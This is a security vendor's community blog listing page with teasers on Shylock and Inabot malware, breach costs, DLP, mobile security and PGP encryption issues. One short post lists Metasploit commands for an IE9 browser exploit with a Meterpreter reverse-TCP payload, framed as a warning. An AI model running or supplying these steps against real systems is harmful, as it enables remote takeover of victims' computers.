Video Screencast Help
Search Video Help Close Back
to help

Security Community Blog

Showing posts tagged with Endpoint Encryption
Showing posts in English
Featured: New Trojan.Shylock wave
Brandon Noble | 28 Aug 2012 | 0 comments

We have been seeing a recent wave of Trojan.Shylock variants with a lot of additional functionality than the older versions we have been used to.

Initially, many of these variants are detected generically as Backdoor.Trojan or Trojan Horse, but our new Shylock heuristic signatures (Trojan.Shylock!gen6 and Trojan.Shylock!gen7) should be changing this to a more accurate naming convention, and should be picking up a much wider spread of these threats.

Additionally we are hearing about some behavior that we have not been able to reproduce. Reports are saying that legitimate documents are getting hidden and then shortcuts with the same name of the document are being added in their place. These shortcuts actually launch a thumbs.db(x) file which is the Shylock Trojan, and they are meant to trick the user into running the threat. This is common behavior of for threats, as noted in this blog article from May 2012,...

Read more
W32.Inabot - Support Perspective and Battle Plan
Brandon Noble | 25 Apr 2013 | 2 comments

I. BACKGROUND:
We have been receiving a few scattered cases of outbreaks from a file labeled snkb00ptz.exe or snkb0ptz.exe, but it seems to be on the rise.

It's normally considered poor troubleshooting to use the file name for any type of identification of a threat, but recent examples have made this practical. Even though these files were detected as many different threat names and families (Trojan.gen, w32.IRCBot.NG, Downloader, etc), the cases all reported the same behavior and symptoms.

After some additional investigation, Symantec Security Response has broken out detection for W32.Inabot. That's short for the Insomnia IRC bot. More information is available from the makers of this threat in their manual, here: http://pastebin.com/dvpu8Zwb

For those of you familiar with W32.Changeup, much of this...

Read more
latest virus attacks and its imapact
K S Sharma | 17 Feb 2013 | 1 comment

Dear All,

As day by day security threat are increasing  and u need to more proactive approach to find latest details and make security tighten. As hackers group are continously working to break out security measures but at the same time organization spending lots of resource and money to make bussiness smooth and secure.

I think this is not just spending the money on IT security and having securty experts. makes u secure by implementing the security solutions. It is equally important to you how intellegently and smartly you take care each sides of security threats and configure it accordingly.

Please also read below threads for getting updates on some recent security threats

 

  • Shamoon virus targets energy sector infrastructure

            ...

Read more
Symantec Connect Post Round up #1
jjesse | 14 Jan 2013 | 0 comments

 

I have been using Evernote for awhile but was recently introduced with the Chrome extension Evernote Clipper and this has changed how I browse the web and more importantly how I browse Symantec Connect.  So I started clipping various blog entries, articles and other information stored on the site to save for later.  In order to help share this information I will be creating a round up of various posts I've found interesting or important and post them to both my blog and also Symantec Connect.  Since I'm focusing on Symantec Security this year, these posts will be filed under the security portion of Connect.

 

So let's get started on Round Up #1 (maybe 1 day I'll come up with a better name or title)

 

...
Read more
Vulnerability
Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Read more
Learn How to Protect Your Hardest-to-Find IP with Intelligent DLP
Jhildy11 Xcend Group | 14 Aug 2012 | 0 comments

In case you missed it, see the archived version from last weeks webinar " Learn How to Protect Even Your Hardest-to-Find IP with Intelligent Data Loss Prevention"

 

 

With the average cost of a breach now topping an incomprehensible $7 million, more and more organizations are looking to Data Loss Prevention solutions to protect their highest value data. Join XCEND, a Platinum Symantec partner and DLP Master Specialist, to learn how you can accurately detect and protect all types of confidential data wherever it is stored or used.  (54 min)
 
Here's the Link to see the Archived Version: https://www2.gotomeeting.com/register/430279362 or go to our website at www.xcendgroup.com  to see all of...
Read more
Information Thieves Can Steal Along With IP, An Organization’s Credibility
Mira Davda | 25 May 2012 | 0 comments

The value of data is appreciating, especially with organizations rapidly  adopting  new technologies to provide access to business information anywhere, at any time. This means threats to data or information translate into business risks to business. These risks, related to reputation, customer loyalty, finance and legal, are not only serious but also quantifiable.   The first benchmark Cost of Data Breach Study in India, conducted by the Ponemon Institute on behalf of Symantec, revealed that the average organizational cost of a data breach in India is INR 53.4 million (53.4 crore), with malicious breaches by hackers or criminal insiders being the most expensive type at INR 4,224 for one compromised record. 

The report further components of the total cost: detection, escalation and redressal formed a significant component, averaging INR 16.4 million (1.64 crore) and INR 20.9 million (2.09 crore) respectively. Victims lost INR 14.6 million (1.46 crore...

Read more
We live in a Mobile world
Marie Pettersson | 10 Feb 2012 | 1 comment

I am absolutely blown away with what is going on in the mobile world and the latest numbers from IDC demonstrate the fact that mobile is breaking every record. A year on year growth of 57% for Smartphone shipments compared to last year. Do I need to say more? These devices will be used for business and private matters and they function merely as a pc. So what is the difference?  I think that we don’t consider that question enough, we simply use it together with all the features we can get our hands on; mobile banking and payments, browsing the web, reading emails, downloading apps, gathering intelligence, and the list goes on... So why should we separate the way we manage mobile devices from any other device or endpoint connected to our network?

Adaptive Mobile did a report last year on the mobile threats and their key conclusions were that mobile scams are way more profitable than the traditional pc scams (2%...

Read more
4 Tips to Combat the Uncommon Cold
Ctrox | 30 Jan 2012 | 1 comment

Aliens have invaded earth with the intent to wipe out mankind. But ex-scientist turned cable technician, David Levinson (Jeff Goldberg), helps mobilize a plan to use the “common cold” or computer “virus” to fight back against the alien species and bring down their defenses in the 1996 movie Independence Day.
 
While the story is fiction, the potential damage that a virus or malware can do to businesses and peoples’ lives is all too real. In fact, attackers unleashed an average of more than nine new threats every second in 2010.
 
The healthcare industry knows firsthand about virus outbreaks. Take the Conficker virus that infected hundreds of MRI devices around the world. In fact, healthcare leads the industry in data breaches with more than 400 health...

Read more
Mac Users, Upgrading to OS X 10.6.8? You Want to Read This First...
Kelvin_Kwan | 13 Jul 2011 | 16 comments

 

We are once again writing to follow-up on our early post related to a similar issue from January.  This time, it’s for Mac OS X upgrades to Apple’s just released 10.6.8 update and PGP Whole Disk Encryption for Macs. 

Much like the previous post, Apple’s automated Mac OS X 10.6.8 Software Update mechanism bypasses the protections of PGP Corporation had put around a critical file needed for normal system startup.  This time however, users who are running 10.1.1-Build 10 and newer had no problems with the Apple 10.6.8 update as expected.  Users running older versions, however, ran into problems.

As communicated previously, the PGP Engineering team discovered that the Apple automated Software Update mechanism bypassed the protections PGP built-in to protect the boot.efi file.  This...

Read more